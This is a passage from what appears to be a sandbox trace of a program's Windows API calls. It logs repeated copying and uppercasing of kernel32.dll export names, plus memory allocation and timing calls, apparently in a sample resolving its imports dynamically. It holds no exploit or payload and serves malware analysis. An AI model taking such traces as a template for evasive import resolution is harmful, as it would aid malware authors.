(in: lpString1=0x32df0ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0092.546] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0092.546] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0092.546] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0092.546] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0092.546] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0092.546] lstrcpyA (in: lpString1=0x32df0ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0092.546] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0092.546] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0092.546] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0092.546] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0092.546] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0092.546] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0092.546] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0092.546] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0092.546] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0092.546] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0092.546] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0092.547] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0092.547] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0092.547] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0092.547] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0092.547] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0092.547] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0092.547] lstrcpyA (in: lpString1=0x32df0ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0092.547] lstrlenA (lpString="BEEP") returned 4 [0092.547] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0092.547] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0092.547] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0092.547] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0092.547] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0092.547] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0092.547] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0092.547] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0092.547] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0092.547] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0092.547] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0092.547] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0092.547] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0092.547] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0092.547] lstrcpyA (in: lpString1=0x32df0ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0092.547] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0092.547] lstrcpyA (in: lpString1=0x32df0ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0092.547] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0092.547] lstrcpyA (in: lpString1=0x32df0ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0092.547] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0092.547] lstrcpyA (in: lpString1=0x32df0ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0092.547] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0092.547] lstrcpyA (in: lpString1=0x32df0ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0092.547] lstrlenA (lpString="CANCELIO") returned 8 [0092.547] lstrcpyA (in: lpString1=0x32df0ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0092.547] lstrlenA (lpString="CANCELIOEX") returned 10 [0092.547] lstrcpyA (in: lpString1=0x32df0ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0092.548] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0092.548] lstrcpyA (in: lpString1=0x32df0ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0092.548] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0092.548] lstrcpyA (in: lpString1=0x32df0ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0092.548] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0092.548] lstrcpyA (in: lpString1=0x32df0ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0092.548] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0092.548] lstrcpyA (in: lpString1=0x32df0ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0092.548] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0092.548] lstrcpyA (in: lpString1=0x32df0ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0092.548] lstrlenA (lpString="CHECKELEVATION") returned 14 [0092.548] lstrcpyA (in: lpString1=0x32df0ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0092.548] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0092.548] lstrcpyA (in: lpString1=0x32df0ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0092.548] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0092.548] lstrcpyA (in: lpString1=0x32df0ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0092.548] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0092.548] lstrcpyA (in: lpString1=0x32df0ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0092.548] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0092.548] lstrcpyA (in: lpString1=0x32df0ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0092.548] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0092.548] lstrcpyA (in: lpString1=0x32df0ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0092.548] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0092.548] lstrcpyA (in: lpString1=0x32df0ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0092.548] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0092.548] lstrcpyA (in: lpString1=0x32df0ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0092.548] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0092.548] lstrcpyA (in: lpString1=0x32df0ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0092.548] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0092.548] CloseHandle (hObject=0x1e0) returned 1 [0092.549] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1388) Thread: id = 59 os_tid = 0xa98 [0048.176] VirtualAlloc (lpAddress=0x0, dwSize=0xf7, flAllocationType=0x3000, flProtect=0x4) returned 0x590000 [0048.177] GetTickCount () returned 0x11451d8 [0048.181] VirtualAlloc (lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x4) returned 0x5a0000 [0048.182] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x5b0000 [0048.182] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x5c0000 [0048.187] GetTickCount () returned 0x11451e8 [0048.187] GetTickCount () returned 0x11451e8 [0048.187] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x6d0000 [0048.187] lstrlenA (lpString="kernel32.dll") returned 12 [0048.187] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0048.187] lstrcpyA (in: lpString1=0x341f130, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0048.187] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0048.188] lstrcpyA (in: lpString1=0x341f130, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0048.188] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0048.188] lstrcpyA (in: lpString1=0x341f130, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0048.188] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0048.188] lstrcpyA (in: lpString1=0x341f130, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0048.188] lstrlenA (lpString="ADDATOMA") returned 8 [0048.188] lstrcpyA (in: lpString1=0x341f130, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0048.188] lstrlenA (lpString="ADDATOMW") returned 8 [0048.188] lstrcpyA (in: lpString1=0x341f130, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0048.188] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0048.188] lstrcpyA (in: lpString1=0x341f130, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0048.188] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0048.188] lstrcpyA (in: lpString1=0x341f130, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0048.188] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0048.188] lstrcpyA (in: lpString1=0x341f130, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0048.188] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0048.188] lstrcpyA (in: lpString1=0x341f130, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0048.188] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0048.188] lstrcpyA (in: lpString1=0x341f130, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0048.188] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0048.188] lstrcpyA (in: lpString1=0x341f130, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0048.188] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0048.188] lstrcpyA (in: lpString1=0x341f130, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0048.188] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0048.188] lstrcpyA (in: lpString1=0x341f130, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0048.188] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0048.188] lstrcpyA (in: lpString1=0x341f130, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0048.188] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0048.189] lstrcpyA (in: lpString1=0x341f130, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0048.189] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0048.189] lstrcpyA (in: lpString1=0x341f130, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0048.189] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0048.189] lstrcpyA (in: lpString1=0x341f130, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0048.189] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0048.189] lstrcpyA (in: lpString1=0x341f130, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0048.189] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0048.189] lstrcpyA (in: lpString1=0x341f130, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0048.189] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0048.189] lstrcpyA (in: lpString1=0x341f130, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0048.189] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0048.189] lstrcpyA (in: lpString1=0x341f130, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0048.189] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0048.189] lstrcpyA (in: lpString1=0x341f130, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0048.189] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0048.189] lstrcpyA (in: lpString1=0x341f130, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0048.189] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0048.189] lstrcpyA (in: lpString1=0x341f130, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0048.189] lstrlenA (lpString="BACKUPREAD") returned 10 [0048.189] lstrcpyA (in: lpString1=0x341f130, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0048.189] lstrlenA (lpString="BACKUPSEEK") returned 10 [0048.189] lstrcpyA (in: lpString1=0x341f130, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0048.189] lstrlenA (lpString="BACKUPWRITE") returned 11 [0048.189] lstrcpyA (in: lpString1=0x341f130, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0048.190] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0048.190] lstrcpyA (in: lpString1=0x341f130, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0048.190] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0048.190] lstrcpyA (in: lpString1=0x341f130, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0048.190] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0048.190] lstrcpyA (in: lpString1=0x341f130, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0048.190] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0048.190] lstrcpyA (in: lpString1=0x341f130, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0048.190] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0048.190] lstrcpyA (in: lpString1=0x341f130, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0048.190] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0048.190] lstrcpyA (in: lpString1=0x341f130, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0048.190] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0048.190] lstrcpyA (in: lpString1=0x341f130, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0048.190] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0048.190] lstrcpyA (in: lpString1=0x341f130, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0048.190] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0048.190] lstrcpyA (in: lpString1=0x341f130, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0048.190] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0048.190] lstrcpyA (in: lpString1=0x341f130, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0048.190] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0048.190] lstrcpyA (in: lpString1=0x341f130, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0048.190] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0048.190] lstrcpyA (in: lpString1=0x341f130, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0048.190] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0048.190] lstrcpyA (in: lpString1=0x341f130, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0048.190] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0048.190] lstrcpyA (in: lpString1=0x341f130, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0048.191] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0048.191] lstrcpyA (in: lpString1=0x341f130, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0048.191] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0048.191] lstrcpyA (in: lpString1=0x341f130, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0048.191] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0048.191] lstrcpyA (in: lpString1=0x341f130, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0048.191] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0048.191] lstrcpyA (in: lpString1=0x341f130, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0048.191] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0048.191] lstrcpyA (in: lpString1=0x341f130, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0048.191] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0048.191] lstrcpyA (in: lpString1=0x341f130, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0048.191] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0048.191] lstrcpyA (in: lpString1=0x341f130, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0048.191] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0048.191] lstrcpyA (in: lpString1=0x341f130, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0048.191] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0048.191] lstrcpyA (in: lpString1=0x341f130, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0048.191] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0048.191] lstrcpyA (in: lpString1=0x341f130, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0048.191] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0048.191] lstrcpyA (in: lpString1=0x341f130, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0048.191] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0048.191] lstrcpyA (in: lpString1=0x341f130, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0048.191] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0048.191] lstrcpyA (in: lpString1=0x341f130, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0048.191] lstrlenA (lpString="BEEP") returned 4 [0048.192] lstrcpyA (in: lpString1=0x341f130, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0048.192] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0048.192] lstrcpyA (in: lpString1=0x341f130, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0048.192] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0048.192] lstrcpyA (in: lpString1=0x341f130, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0048.192] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0048.192] lstrcpyA (in: lpString1=0x341f130, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0048.192] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0048.192] lstrcpyA (in: lpString1=0x341f130, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0048.192] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0048.192] lstrcpyA (in: lpString1=0x341f130, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0048.192] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0048.192] lstrcpyA (in: lpString1=0x341f130, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0048.192] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0048.192] lstrcpyA (in: lpString1=0x341f130, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0048.192] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0048.192] lstrcpyA (in: lpString1=0x341f130, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0048.192] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0048.192] lstrcpyA (in: lpString1=0x341f130, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0048.192] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0048.192] lstrcpyA (in: lpString1=0x341f130, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0048.192] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0048.192] lstrcpyA (in: lpString1=0x341f130, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0048.192] lstrlenA (lpString="CANCELIO") returned 8 [0048.192] lstrcpyA (in: lpString1=0x341f130, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0048.192] lstrlenA (lpString="CANCELIOEX") returned 10 [0048.192] lstrcpyA (in: lpString1=0x341f130, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0048.192] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0048.193] lstrcpyA (in: lpString1=0x341f130, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0048.193] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0048.193] lstrcpyA (in: lpString1=0x341f130, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0048.193] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0048.193] lstrcpyA (in: lpString1=0x341f130, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0048.193] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0048.193] lstrcpyA (in: lpString1=0x341f130, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0048.193] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0048.193] lstrcpyA (in: lpString1=0x341f130, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0048.193] lstrlenA (lpString="CHECKELEVATION") returned 14 [0048.193] lstrcpyA (in: lpString1=0x341f130, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0048.193] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0048.193] lstrcpyA (in: lpString1=0x341f130, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0048.193] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0048.193] lstrcpyA (in: lpString1=0x341f130, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0048.193] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0048.193] lstrcpyA (in: lpString1=0x341f130, lpString2="CheckNameLegalDOS8Dot3W" | out: 